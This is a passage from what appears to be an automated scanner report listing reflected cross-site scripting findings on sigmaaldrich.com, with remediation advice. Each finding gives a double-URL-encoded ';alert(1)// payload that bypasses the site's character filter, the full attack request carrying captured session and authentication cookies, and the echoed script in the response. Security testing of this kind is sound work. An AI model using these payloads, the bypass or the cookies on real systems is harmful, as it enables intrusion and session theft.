Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:42 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social4b5db";alert(1)//422503a5bc0/twitter-25x25","E404") ;
   </script>
...[SNIP]...

1.487. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ba2f%2522%253balert%25281%2529%252f%252f139dfdef706 was submitted in the REST URL parameter 5. This input was echoed as 7ba2f";alert(1)//139dfdef706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social/twitter-25x257ba2f%2522%253balert%25281%2529%252f%252f139dfdef706 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:44 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social/twitter-25x257ba2f";alert(1)//139dfdef706","E404") ;
   </script>
...[SNIP]...

1.488. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3bd2%2522%253balert%25281%2529%252f%252f595f6da6914 was submitted in the REST URL parameter 1. This input was echoed as b3bd2";alert(1)//595f6da6914 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcb3bd2%2522%253balert%25281%2529%252f%252f595f6da6914/medialib/sigma-aldrich/social/youtube-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcb3bd2";alert(1)//595f6da6914/medialib/sigma-aldrich/social/youtube-25x25","E404") ;
   </script>
...[SNIP]...

1.489. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cf4%2522%253balert%25281%2529%252f%252fbc12d2c2272 was submitted in the REST URL parameter 2. This input was echoed as 34cf4";alert(1)//bc12d2c2272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib34cf4%2522%253balert%25281%2529%252f%252fbc12d2c2272/sigma-aldrich/social/youtube-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib34cf4";alert(1)//bc12d2c2272/sigma-aldrich/social/youtube-25x25","E404") ;
   </script>
...[SNIP]...

1.490. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93003%2522%253balert%25281%2529%252f%252f68f2c0b52 was submitted in the REST URL parameter 3. This input was echoed as 93003";alert(1)//68f2c0b52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich93003%2522%253balert%25281%2529%252f%252f68f2c0b52/social/youtube-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:47 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich93003";alert(1)//68f2c0b52/social/youtube-25x25","E404") ;
   </script>
...[SNIP]...

1.491. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc581%2522%253balert%25281%2529%252f%252ff0308a4b9 was submitted in the REST URL parameter 4. This input was echoed as dc581";alert(1)//f0308a4b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/socialdc581%2522%253balert%25281%2529%252f%252ff0308a4b9/youtube-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
